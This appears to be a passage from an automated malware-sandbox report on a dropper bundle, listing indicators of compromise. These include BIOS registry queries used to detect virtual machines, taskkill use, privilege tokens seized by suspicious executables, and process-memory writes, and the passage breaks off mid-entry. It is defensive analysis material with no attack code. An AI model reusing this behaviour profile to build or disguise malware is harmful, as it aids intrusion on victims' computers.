WerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeBuhinylaco.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeInstall.exeWerFault.exeWerFault.exeInstall.exeWerFault.exeWerFault.exe7Ga22DMpgGLNmIcC0zmTTu3r.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Buhinylaco.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Buhinylaco.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 7Ga22DMpgGLNmIcC0zmTTu3r.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 7Ga22DMpgGLNmIcC0zmTTu3r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5852 taskkill.exe 4716 taskkill.exe 3840 taskkill.exe 3728 taskkill.exe -
Modifies data under HKEY_USERS 47 IoCs
Processes:
sihclient.exesvchost.exemsiexec.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe -
Modifies registry class 9 IoCs
Processes:
VC_redist.x86.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Dependents VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\ = "{a8968509-65be-4c09-a460-fd1584b1cdbf}" VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Version = "14.29.30040.0" VC_redist.x86.exe Key created \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\DisplayName = "Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.29.30040" VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Dependents\{a8968509-65be-4c09-a460-fd1584b1cdbf} VC_redist.x86.exe -
Processes:
installer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Wed15566afaea59e.exeWed15228d911b9d5c.exepid process 908 Wed15566afaea59e.exe 908 Wed15566afaea59e.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe 1448 Wed15228d911b9d5c.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
foldershare.exepid process 3212 3700 foldershare.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
spcXk4nVIHzYkQq80aGWITZP.exe184C.exepid process 2676 spcXk4nVIHzYkQq80aGWITZP.exe 5432 184C.exe -
Suspicious behavior: SetClipboardViewer 3 IoCs
Processes:
2805835.scr6844977.scrsvchost.exepid process 5016 2805835.scr 5860 6844977.scr 7572 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Wed15ac1df9305ded09.exeWed154a69e494d5e99ca.exeWed1529d8198a8f0c1.exetaskkill.exe1207294.scrShadowVPNInstaller_t1.exemsedge.exeWerFault.exeWed15566afaea59e.exeDownFlSetup110.exeUW7CKXEsUQxJjyDaLLnybOuF.exeConhost.exeConhost.exetaskkill.exe4384150.scr1156783.scr6215607.scr8983957.scrChrome 5.exepowershell.exe9DozPzDynjFKwiIswvyuxQd7.exedescription pid process Token: SeCreateTokenPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeAssignPrimaryTokenPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeLockMemoryPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeIncreaseQuotaPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeMachineAccountPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeTcbPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeSecurityPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeTakeOwnershipPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeLoadDriverPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeSystemProfilePrivilege 3488 Wed15ac1df9305ded09.exe Token: SeSystemtimePrivilege 3488 Wed15ac1df9305ded09.exe Token: SeProfSingleProcessPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeIncBasePriorityPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeCreatePagefilePrivilege 3488 Wed15ac1df9305ded09.exe Token: SeCreatePermanentPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeBackupPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeRestorePrivilege 3488 Wed15ac1df9305ded09.exe Token: SeShutdownPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeDebugPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeAuditPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeSystemEnvironmentPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeChangeNotifyPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeRemoteShutdownPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeUndockPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeSyncAgentPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeEnableDelegationPrivilege 3488 Wed15ac1df9305ded09.exe Token: SeManageVolumePrivilege 3488 Wed15ac1df9305ded09.exe Token: SeImpersonatePrivilege 3488 Wed15ac1df9305ded09.exe Token: SeCreateGlobalPrivilege 3488 Wed15ac1df9305ded09.exe Token: 31 3488 Wed15ac1df9305ded09.exe Token: 32 3488 Wed15ac1df9305ded09.exe Token: 33 3488 Wed15ac1df9305ded09.exe Token: 34 3488 Wed15ac1df9305ded09.exe Token: 35 3488 Wed15ac1df9305ded09.exe Token: SeDebugPrivilege 3600 Wed154a69e494d5e99ca.exe Token: SeDebugPrivilege 4532 Wed1529d8198a8f0c1.exe Token: SeDebugPrivilege 5852 taskkill.exe Token: SeDebugPrivilege 5184 1207294.scr Token: SeIncBasePriorityPrivilege 1176 ShadowVPNInstaller_t1.exe Token: SeDebugPrivilege 1176 ShadowVPNInstaller_t1.exe Token: SeLoadDriverPrivilege 1176 ShadowVPNInstaller_t1.exe Token: SeRestorePrivilege 4692 msedge.exe Token: SeBackupPrivilege 4692 msedge.exe Token: SeRestorePrivilege 4544 WerFault.exe Token: SeBackupPrivilege 4544 WerFault.exe Token: SeDebugPrivilege 908 Wed15566afaea59e.exe Token: SeDebugPrivilege 5992 DownFlSetup110.exe Token: SeDebugPrivilege 5708 UW7CKXEsUQxJjyDaLLnybOuF.exe Token: SeDebugPrivilege 5728 Conhost.exe Token: SeDebugPrivilege 1500 Conhost.exe Token: SeDebugPrivilege 4716 taskkill.exe Token: SeDebugPrivilege 1036 4384150.scr Token: SeDebugPrivilege 3104 1156783.scr Token: SeDebugPrivilege 5396 6215607.scr Token: SeDebugPrivilege 1896 8983957.scr Token: SeDebugPrivilege 4772 Chrome 5.exe Token: SeDebugPrivilege 5188 powershell.exe Token: SeCreateTokenPrivilege 6464 9DozPzDynjFKwiIswvyuxQd7.exe Token: SeAssignPrimaryTokenPrivilege 6464 9DozPzDynjFKwiIswvyuxQd7.exe Token: SeLockMemoryPrivilege 6464 9DozPzDynjFKwiIswvyuxQd7.exe Token: SeIncreaseQuotaPrivilege 6464 9DozPzDynjFKwiIswvyuxQd7.exe Token: SeMachineAccountPrivilege 6464 9DozPzDynjFKwiIswvyuxQd7.exe Token: SeTcbPrivilege 6464 9DozPzDynjFKwiIswvyuxQd7.exe Token: SeSecurityPrivilege 6464 9DozPzDynjFKwiIswvyuxQd7.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
setup_2.tmpultramediaburner.tmpmsedge.exeinstaller.exemsiexec.exepid process 3204 setup_2.tmp 6028 ultramediaburner.tmp 5520 msedge.exe 676 installer.exe 15868 msiexec.exe 15868 msiexec.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
fgDR8hyJENJYl9yqtAWdPr0t.execmd.execmd.exepid process 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 7020 cmd.exe 2624 cmd.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3212 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 5052 wrote to memory of 4928 5052 setup_x86_x64_install.exe setup_installer.exe PID 5052 wrote to memory of 4928 5052 setup_x86_x64_install.exe setup_installer.exe PID 5052 wrote to memory of 4928 5052 setup_x86_x64_install.exe setup_installer.exe PID 4928 wrote to memory of 4740 4928 setup_installer.exe setup_install.exe PID 4928 wrote to memory of 4740 4928 setup_installer.exe setup_install.exe PID 4928 wrote to memory of 4740 4928 setup_installer.exe setup_install.exe PID 4740 wrote to memory of 2128 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 2128 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 2128 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 2816 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 2816 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 2816 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 988 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 988 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 988 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3876 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3876 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3876 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 4376 4740 setup_install.exe 